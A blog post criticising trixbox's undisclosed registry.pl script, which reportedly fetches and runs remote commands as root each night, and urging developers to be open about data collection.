You may have read that a user discovered last week that current trixbox systems as recently as today include a remotely-configurable BOT, a software program that can execute certain commands locally once it receives its instructions. Reportedly, trixbox’s registry.pl "phones home" to Fonality via the Internet at 3:41 a.m. each morning to get a list of Linux commands to run. It then executes those Linux commands on your server while you’re sleeping. If the assertions of trixbox end users are true and we have no reason to believe otherwise, the existence of this remotely-configurable BOT had never been disclosed to unsuspecting users whether they were individuals or corporations. In fact, it doesn’t appear that even trixbox resellers were aware of the existence of the remotely-configurable BOT.
Let me hasten to add that Chris, Andrew, and Kerry have been good business partners of Nerd Vittles for years even though I’ve never personally met any of them. So I would never suspect that any one of them would use a tool like this for improper purposes. Our objection is more fundamental and goes to the existence of the tool itself and the failure to disclose it. Unfortunately, a remotely configurable BOT with root access privileges is a bit like giving someone a blank check… with your signature affixed. And it’s worse in this case because users had no notice that they were handing over the keys to their castle by installing and using trixbox. One can’t help wondering if Fonality management really grasps how dangerous such a system design is in this day and age. This isn’t about the commands that Fonality was executing. It’s about the commands that could be executed if this system were ever compromised. We have daily logs full of attempts to hack our systems using, you guessed it, remotely controlled BOTS.
We don’t for a minute believe that Chris Lyman and other senior management of Fonality knew about this in advance, but they certainly know now! The problem is that many programmers, in attempting to perfect the world’s finest software app, fail to consider what would happen if a tool like this one got into the wrong hands, for example the hands of a disgruntled employee. Unfortunately, just about every organization has at least one not-so-happy camper, and companies usually don’t know how dangerous such employees are until it’s too late. We obviously have no idea what safeguards Fonality may have put in place to monitor access and prevent abuse of this tool. For everyone’s sake in the Asterisk® community, we would hope LOADS OF THEM! A security breach at Fonality would basically hand over all of these trixbox systems for remote command execution as root. Or, if anyone’s DNS system is compromised, affected trixbox servers are now everyone’s worst nightmare. Hello!!!
As with many business decisions presented to organizations, the balancing act here is whether the benefits of collecting what have been represented to be marketing and usage statistics outweighed the risks if your absolute worst imaginable scenario came to pass. Merely revealing the existence of this tool made most folks shudder. And it’s still in operation. Remember, any Linux command or application could be executed with root privileges using this BOT. Take a look at the 25+ pages of comments on the trixbox forum, Google’s VoIP Users Conference, VOIPSEC, and now Slashdot if you have any doubts about the user reaction. Do we really think the crackers of the world can’t read? Is this what we want folks to remember when they hear about Asterisk?
Now imagine control of a tool like this getting into the wrong hands where someone could actually compromise the security of outside companies that knew nothing about its existence. All it took to execute commands on every newly-deployed trixbox server in the world was creation of a list of commands presumably stored on a server within the Fonality organization somewhere. Now you can appreciate how threatening a software design decision can be.
Having a hard-coded reporting mechanism that everyone is notified about up front was one thing, and that’s where this collection process began with trixbox 2. But it morphed into an open-ended, remotely-configurable BOT. And that is something quite different and downright dangerous. Suffice it to say, if we ever hope to seriously introduce Asterisk into the business community, there’s no room for BOTs in the equation, much less hidden ones. No business would knowingly tolerate an open-ended, remotely configurable BOT running on any server inside its corporate firewall, particularly one with the breadth of Linux applications at its disposal that one would normally find on trixbox systems.
This clever software should have been reviewed by senior management before it ever saw the light of day. The episode gives all of us a golden opportunity to stop and think about what we’re doing and what our fundamental obligations are to those who use our code. Hopefully, Fonality will turn this BOT off… permanently! The problem, of course, is that it’s hard to unring a bell. This BOT is already in the wild. Luckily there’s a very quick solution in this case. Here’s the command that should be added to tomorrow morning’s Fonality script: rm -f /var/adm/bin/registry.pl. We’ll all sleep better.
We hope everyone in the Asterisk development community will make a pledge to be open about the existence and scope of any future data collection processes associated with Asterisk offerings. Then users can make an informed choice on whether to use your software. A new trixbox forum member put it this way:
There is an understanding between users and developers. The understanding is often tacit but is nonetheless there. The understanding goes, "I will be executing something you wrote. I do not have the time/ability to check it all, but as professionals, I expect you to behave in a manner befitting that trust." –Minupla
We couldn’t have said it better. As for our own software, we want to be crystal clear: No Remotely-Configurable BOTs Ever! They have no legitimate purpose when weighed against the very substantial security risks they pose to all of us.
Full Disclosure. With the help of some very talented partners, Nerd Vittles now has an Asterisk-based PBX offering of its own, PBX in a Flash. It arguably "competes" against Fonality’s trixbox ce even though both offerings are free for the taking. Having written over 100 columns touting the beauties of trixbox, we felt some obligation to warn our users who may have upgraded to a more recent version of Fonality’s software. You may also want to review this article from Philippe Lindheimer, the lead developer of FreePBX.
Some Recent Nerd Vittles Articles of Interest…